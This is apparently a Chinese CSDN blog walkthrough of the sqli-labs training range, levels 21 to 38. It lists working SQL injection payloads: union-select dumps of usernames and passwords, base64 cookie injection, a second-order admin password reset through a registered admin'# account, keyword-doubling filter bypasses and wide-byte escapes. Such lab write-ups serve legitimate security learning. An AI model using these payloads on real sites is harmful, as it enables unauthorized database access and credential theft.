sqli-labs(Page 2)

最新推荐文章于 2024-05-18 15:04:49 发布
最新推荐文章于 2024-05-18 15:04:49 发布
阅读量259 收藏 1
点赞数
分类专栏: sqli-labs SQL
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Lorezon/article/details/105446488
版权

Less-21

在这里插入图片描述
虽然是Cookie注入,但是uname处却有些怪异,明明输入的是Dumb,结果却显示了一串字符,标题显示Base64。

在这里插入图片描述
对传入的参数进行加密处理。

对Payload进行编码
admin' and 1=1--+
YWRtaW4nIGFuZCAxPTEtLSs
在这里插入图片描述有了错误回显。

之后就是构造闭合,通过')闭合。
Payload:-admin') order by 3#查字段长,然后就是正常流程了,只需要对Payload进行编码即可。

但是我在编码时候:
在这里插入图片描述
emmmmmmmmmmmmmmm。。。。

换一个平台就好了。

至于具体的构造语句,可以参考我上一篇内容:sqli-labs(Page 1)

在这里插入图片描述

Less-22

只需要找到闭合位置,替换成-admin" and 1=1#即可,Payload是一样的。

在这里插入图片描述

Less-23

这关白盒比较好做。

if(isset($_GET['id']))
{
$id=$_GET['id'];

//filter the comments out so as to comments should not work
$reg = "/#/";
$reg1 = "/--/";
$replace = "";
$id = preg_replace($reg, $replace, $id);
$id = preg_replace($reg1, $replace, $id);
//logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a');
fwrite($fp,'ID:'.$id."\n");
fclose($fp);

对注释符进行了替换。咋办,找大佬。下面是大佬的思路。

构造语句:id=' union select 1,2,3 '

在这里插入图片描述爆出回显点,接下来Payload就一样了。

爆表:' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() or '1'='

在这里插入图片描述爆列和上面一样,爆值有区别:

爆值:?id=' union select 1,group_concat(username),group_concat(password) from users where 1 or '1'='

在这里插入图片描述

Less-24

这关很有趣,还是登录框,但是多了注册新用户的选项。

在这里插入图片描述

抓包没什么有用东西,还是要在页面上操作。

先注册一个新用户。
在这里插入图片描述
test,密码123456

然后用注册的用户登录,发现有修改密码的功能。

在这里插入图片描述
既然是修改密码,那肯定和数据库连接,数据库怎么改变数据内容呢,update语句。

怎么才能登录admin帐号呢。

通过偷天换日。

先注册一个admin'#帐号,密码123456。

在这里插入图片描述用这个帐号登录。

在这里插入图片描述

现在我们是admin'#身份登录,修改它的密码。

在对密码进行修改的时候,数据库执行这条语句:
UPDATE users SET PASSWORD='$pass' where username='admin'#' and password='456789'

而我们用的'#符号派上了用场,注释掉了,整条语句就变为了:

UPDATE users SET PASSWORD='$pass' where username='admin' and password='456789''

在这里插入图片描述

然后用admin帐号登录,密码就是刚才修改的。

在这里插入图片描述成功登录了admin帐号。

Less-25

在这里插入图片描述
直接就说了orand这关被过滤了。

绕过。

一种方法是直接不用,直接拼接id=1'--+,还有一种方法就是双写1' oorr 1=1--+1' aandnd 1=1--+

不过做的时候遇到一个问题就是,它给了我一个配置错误信息:

在这里插入图片描述

根据提示我查看了源码:

在这里插入图片描述
暂时还不知道什么原因。上次做的时候没出现问题。没办法了,后面几关都记录不上了。

Less-25到Less-28请去这个博客:https://blog.csdn.net/qq_41420747/article/details/81836327

Less-29

这关正常了。

加单引号错误。
构造:-1' union select 1,database(),3--+

在这里插入图片描述之后就还是那些Payload

在这里插入图片描述

Less-30

只需要把上一关的单引号闭合替换为双引号即可。

在这里插入图片描述

在这里插入图片描述

Less-31

id=-1") union select 1,2,3--+即可

在这里插入图片描述

Less-32

在这里插入图片描述

显示信息说input is escaped。猜测是被转义了,宽字节绕过。

1%df' and 1=1--+

在这里插入图片描述

1正常,2异常,说明存在注入点。

在这里插入图片描述
之后是一样的。

在这里插入图片描述

Less-33

仍然是宽字节绕过。

绕过AddSlashes%E6%27注释掉AddSlahes函数转义进来的\符号。

在这里插入图片描述然后都是一样的。

在这里插入图片描述

Less-34

登录一下,方法还是宽字节绕过。
抓包分析,上一关的%E6%27仍然可以用,唯一不同的是这关我这里字段长只有2个,其他不变。

在这里插入图片描述

Less-35

开始还是想宽字节了,结果都不行,然后看了眼标题,不需要在意,那直接单引号。

在这里插入图片描述

传入的参数前后都没有什么符号,那就直接注。

在这里插入图片描述在这里插入图片描述

Less-36

绕过MySQL real_escape_string

直接%df%27注入即可。

在这里插入图片描述

Less-37

POST方式,抓包,依然是%df%27注入,不同的是字段长为2,其他不变。

在这里插入图片描述

Less-38

0值绕过(原谅我一时想不起这种方法叫什么了)

直接构造?id=0' union select 1,2,3--+即可

在这里插入图片描述

诸君共勉。

Sure_lis
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
SQLI-LABS Page-1
Web学习之路
04-03 280
sqli-labs page-1
SQLI-LABS Page-2
Web学习之路
04-08 147
sqli-labs page-2
详细sqli-labs(1-20)通关讲解
m0_57928318的博客
05-18 1529
获取数据库名时可以使用 left() 函数,这里使用 substr() 函数截取数据库名的每个字符,然后使用 ASCII() 函数判断这个字符的 ASCII 码值。我们可以看出,GET 方式和post 方式 的区别,GET方式 可以明显的 从 URL 中进行注入,POST可以在数据包中进行修改对应的字段来进行 SQL 注入。获取数据库名时,使用 LEFT() 函数进行穷举法的效率较低,使用 substr() 函数结合 ASCII() 函数进行判断可以使用二分法快速缩小范围。
sqli-labs通关汇总-page2
m0_37638874的博客
05-31 520
less-21 标题:Cookie injection base64 encoded single quotes and parenthesis 文章标题告知是 base64编码的 ') 闭合的cookie注入 和20关的流程一样,我们抓包能看到 cookie是加密的,base64是一种常见的加密格式,怎么判断是不是base64呢,一般是 字符串的长度为4的整数倍。 字符串的符号取值只能在 A-Z, a-z, 0-9, +, /, = 共计65个字符中,且 = 如果出现就必须在结尾出现。 可详见 一篇
SQLi-LABS Page-1(Basic Challenges)1-22关
2301_77887106的博客
05-18 1491
3.使用1' and if(ascii(substr((select column_name from information_schema.columns where table_schema="指定数据库名字" and table_name="指定数据库表" limit 0,1),1,1))=55,sleep(2),0)--+来对数据库的首个字母所属的ascii值正逐个爆破,直到触发睡眠为止。id=1'+and+left(database(),2)='s§a§'--+,继续爆破,可以看到第二位为e。
Sqli-labs靶场第12关详解[Sqli-labs-less-12]
m0_73615178的博客
03-02 566
所以,payload分析输入一个username值然后使用单引号加小括号 ") 闭合前面的语句,然后为了使where语句条件成立,加上一个or 1=1 ,-- 注释语句使后面的语句直接注释password不用判断。由于这题是post请求,所以先使用burp进行抓包,然后将数据包存入txt文件中打包 用-r 选择目标txt文件。根据题目看,像一个登录页面,尝试使用布尔型盲注测试能否登录网站。输入:-admin") union select 1,2--爆出当前数据库名称及当前用户名。
sqli-labs解题记录
992宸的博客
02-01 1803
在数据库information_schema中的tables表里查询出security数据库的表有:emails,referers,uagents,users。在数据库information_schema中的tables表里查询出security数据库的表有:emails,referers,uagents,users。在数据库information_schema中的tables表里查询出security数据库的表有:emails,referers,uagents,users。,由此可知数据库名是8位。
sqli-labs靶场搭建
joey_1123的博客
05-21 1018
4.打开D:\phpstudy_pro\WWW\sqli-labs\sql-connections中的db-creds.inc 修改如图。3.把这个解压到php根目录下 修改名字为sqli-labs。9.退回再点第一个SQLi-LABS Page…7.用浏览器访问127.0.0.1/sqli-labs。5.修改phpstudy中数据库的密码为123456。2.去github上下载sqli-labs。8.点击第二个选项Setup/reset…注:不能使用 php7.x 版本。sqli-labs靶场搭建。
SQLi-LABS Page-4 (Challenges)
qq_61774705的博客
08-10 447
sql
sqli-labs通关汇总-page1
m0_37638874的博客
05-31 1091
前言: 刚辞去变压器方面的工作,准备回归老本行,干渗透测试了。 本文章意在学习SQL注入并结合源代码学习PHP。 借助的是sqli-labs靶场,此靶场是搭在本地的,原因不想在虚拟机里下常用的软件了,如何搭建大家自己搜吧,这里不赘述了。 我们已关卡的方式,边过关边学习 我个人认为这篇文章适合初学走细节的人看 less-1 我们直接贴一下第一关的php源码 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w
Sqli-labs靶场第15关详解[Sqli-labs-less-15]自动化注入-SQLmap工具注入
m0_73615178的博客
03-02 792
由于这题是post请求,所以先使用burp进行抓包,然后将数据包存入txt文件中打包 用-r 选择目标txt文件。
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
sqli-labs.rar
12-22
2. SQL注入平台sqli-labs源码:即压缩包内的`sqli-labs`文件夹,包含了各种SQL注入挑战的网页和脚本。 搭建步骤如下: 1. 安装PHPstudy:访问PHPstudy官方网站下载最新版本,根据提示安装到本地计算机上。 2. 启动...
mpu6050陀螺仪使用方法开发教程文档.docx
最新发布
07-30
mpu6050陀螺仪使用方法
【SCI顶级】龙格库塔算法RUN-CNN-LSTM-Multihead-Attention温度预测【含源码 5747期】.zip
07-30
CSDN海神之光上传的全部代码均可运行,亲测可用,直接替换数据即可,适合小白; 1、代码压缩包内容 主函数:Main .m; 数据; 调用函数:其他m文件;无需运行 运行结果效果图; 2、代码运行版本 Matlab 2019b;若运行有误,根据提示修改;若不会,可私信博主; 3、运行操作步骤 步骤一:将所有文件放到Matlab的当前文件夹中; 步骤二:双击打开除Main.m的其他m文件; 步骤三:点击运行,等程序运行完得到结果; 4、仿真咨询 如需其他服务,可私信博主或扫描博主博客文章底部QQ名片; 4.1 CSDN博客或资源的完整代码提供 4.2 期刊或参考文献复现 4.3 Matlab程序定制 4.4 科研合作 智能优化算法-CNN-LSTM-Mutilhead-Attention回归预测系列程序定制或科研合作方向: 4.4.1 遗传算法GA/蚁群算法ACO-CNN-LSTM-Mutilhead-Attention回归预测 4.4.2 粒子群算法PSO/蛙跳算法SFLA-CNN-LSTM-Mutilhead-Attention回归预测 4.4.3 灰狼算法GWO/狼群算法WPA-CNN-LSTM-Mutilhead-Attention回归预测 4.4.4 鲸鱼算法WOA/麻雀算法SSA-CNN-LSTM-Mutilhead-Attention回归预测 4.4.5 萤火虫算法FA/差分算法DE-CNN-LSTM-Mutilhead-Attention回归预测
大模型的数学之魂:统计学习理论精要
07-30
大型机器学习模型,通常简称为“大模型”,是指具有数十亿甚至数千亿参数的深度神经网络模型。这些模型因为其庞大的参数量和复杂的计算结构,能够处理非常复杂的任务和数据,展现出强大的表达能力和预测性能。大模型在自然语言处理、计算机视觉、语音识别和推荐系统等多个领域都有广泛的应用。 大模型的设计目的是通过训练海量数据来学习复杂的模式和特征,从而具备强大的泛化能力,能够对未见过的数据做出准确的预测。与参数较少、层数较浅的小模型相比,大模型虽然需要更多的计算资源和时间来训练和推理,但它们展现出了一种被称为“涌现能力”的特性,即从原始训练数据中自动学习并发现新的、更高层次的特征和模式。 大模型的发展历程可以分为几个阶段,从早期的卷积神经网络模型发展到以Transformer为代表的全新神经网络模型,再到当前以GPT为代表的预训练大模型阶段。Transformer架构因其自注意力机制而成为大模型的核心技术,它使得模型能够更好地理解和处理文本数据中的长距离依赖关系。 大模型的分类主要包括语言大模型(NLP)、视觉大模型(CV)和多模态大模型。语言大模型专注于处理文本数据和理解自然语言,而视觉大模型用
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值